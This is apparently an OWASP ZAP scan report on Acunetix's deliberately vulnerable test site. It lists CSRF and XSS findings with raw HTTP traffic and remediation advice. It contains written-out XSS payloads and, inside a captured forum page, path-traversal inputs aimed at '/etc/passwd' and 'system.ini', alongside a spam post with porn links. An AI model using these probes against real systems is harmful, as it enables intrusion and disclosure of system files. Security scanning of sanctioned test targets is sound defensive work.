ZAP Scanning Report
| Risk Level | Number of Alerts |
|---|---|
|
High
|
9
|
|
Medium
|
8
|
|
Low
|
10
|
|
Informational
|
8
|
|
False Positives:
|
0
|
| HTTP Response Code | Number of Responses |
|---|
| Parameter Name | Type | Flags | Times Used | # Values |
|---|
| HTTP Response Code | Number of Responses |
|---|---|
| 501 Not Implemented |
125
|
| 403 Forbidden |
151
|
| 404 Not Found |
1215
|
| 405 Method Not Allowed |
18
|
| 200 OK |
2608
|
| 400 Bad Request |
21
|
| 301 Moved Permanently |
259
|
| 500 Internal Server Error |
2458
|
| 302 Found |
471
|
| Technology | Version | Categories | Implies |
|---|---|---|---|
|
DreamWeaver
|
Editors
|
||
|
IIS
|
8.5
|
Web servers
|
Windows Server
|
|
Microsoft ASP.NET
|
Web frameworks
|
IIS\;confidence:50
|
|
|
TinyMCE
|
Rich text editors
|
||
|
Windows Server
|
Operating systems
|
| Parameter Name | Type | Flags | Times Used | # Values |
|---|
|
High |
Anti-CSRF Tokens Check |
|---|---|
| Description |
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.
CSRF attacks are effective in a number of situations, including:
* The victim has an active session on the target site.
* The victim is authenticated via HTTP auth on the target site.
* The victim is on the same local network as the target site.
CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
|
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmSearch" method="get" action=""> |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmSearch" method="get" action=""> |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 4 |
| Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
For example, use anti-CSRF packages such as the OWASP CSRFGuard.
Phase: Implementation
Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.
Phase: Architecture and Design
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).
Note that this can be bypassed using XSS.
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Note that this can be bypassed using XSS.
Use the ESAPI Session Management control.
This control includes a component for CSRF.
Do not use the GET method for any request that triggers a state change.
Phase: Implementation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
|
| Reference |
http://projects.webappsec.org/Cross-Site-Request-Forgery
http://cwe.mitre.org/data/definitions/352.html |
| Tags |
OWASP_2021_A05
WSTG-v42-SESS-05 OWASP_2017_A06 |
| CWE Id | 352 |
| WASC Id | 9 |
| Plugin Id | 20012 |
|
High |
Cross Site Scripting (DOM Based) |
|---|---|
| Description |
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
|
| URL | http://testasp.vulnweb.com/Search.asp?name=abc#<img src="random.gif" onerror=alert(5397)> |
| Method | GET |
| Parameter | |
| Attack | ?name=abc#<img src="random.gif" onerror=alert(5397)> |
| Evidence | |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 14 bytes. |
HTTP/1.0 0
|
| Response Body - size: 0 bytes. |
|
| Instances | 1 |
| Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
|
| Reference |
http://projects.webappsec.org/Cross-Site-Scripting
http://cwe.mitre.org/data/definitions/79.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A07 |
| CWE Id | 79 |
| WASC Id | 8 |
| Plugin Id | 40026 |
|
High |
Cross Site Scripting (Persistent) |
|---|---|
| Description |
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
|
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | tfText |
| Attack | </a><script>alert(1);</script><a> |
| Evidence | |
| Request Header - size: 356 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:56:18 GMT Content-Length: 17802 |
| Response Body - size: 17,802 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout 0W45pz4p</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:03 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:/Windows/system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:03 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>../../../../../../../../../../../../../../../../Windows/system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:03 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:\Windows\system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/etc/passwd</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>../../../../../../../../../../../../../../../../etc/passwd</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:\</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 